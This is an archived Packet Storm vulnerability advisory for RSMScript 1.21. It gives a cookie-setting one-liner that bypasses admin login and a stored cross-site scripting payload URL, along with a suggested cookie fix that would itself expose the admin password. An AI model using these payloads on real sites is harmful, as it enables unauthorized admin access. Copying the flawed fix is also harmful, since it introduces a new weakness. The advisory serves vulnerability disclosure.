exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RSMScript 1.21 XSS / Insecure Cookie Handling

RSMScript 1.21 XSS / Insecure Cookie Handling
Posted Dec 17, 2008
Authored by Osirys | Site y-osirys.com

RSMScript version 1.21 suffers from insecure cookie handling and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, insecure cookie handling
SHA-256 | e50c4eff10391dc8ec1ad773294997960fa50e5712ebf4893500a9c266fe11fb

RSMScript 1.21 XSS / Insecure Cookie Handling

Change Mirror Download
[START]

#########################################################################################
[0x01] Informations:

Script : RSMScript 1.21
Download : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1
Vulnerability : Insecure Cookie Handling / XXS
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org
Notes : Proud to be Italian
Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX

#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######

Bugged file is: /[path]/verify.php

[CODE]

if($admin_pass == $code)
{
setcookie("verified", "null", time()+1800);
header( 'refresh: 0; url=update.php' );
}

[/CODE]

As we can see, if the password "$code" typed is the same of $admin_pass, so you log in,
cookie is set with the name "verified" and with content "null". So, a malicious user
can just set up a cookie with that name and value, and then he will be logged as the
admin.

[!] FIX: A fix could be to put as a content or cookie name the password. Example:

[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE]


[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/";

#########################################################################################
[0x03] Bug: [XSS]
######

To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;)
There are two bugged file.

1) /[path/submit.php
In this file, we can put arbitrary data into a .txt file.

[CODE]

$quote = $_REQUEST['quote'];
$writePage = fopen('quotes.txt', 'a') or die("can't open file");
fwrite($writePage, "\t");
fwrite($writePage, stripslashes($quote));
fclose($writePage);

[/CODE]

[!] FIX: Just filter direct user input.


2) /path/update.php
This file gets quotes.txt content, and print it directly into html code.
In 1) we saw that we can put arbitrary data into this .txt file. Just
Put js code ;)

[CODE]

$quotes = file_get_contents("quotes.txt");
$quotes= preg_split("/[\t]+/", $quotes);
$i = 0;
$noQuotes = sizeOf($quotes);
while ($i < $noQuotes)
{
$quote = $quotes[$i];
echo '<option value='.$i.'>'.$quote.'</option>';
$i = $i + 1;
}

[/CODE]

[!] FIX: A fix could be just to filter input before being printed in html code.


## How to exploit this bugs?

[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script>

#########################################################################################
[/END]
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close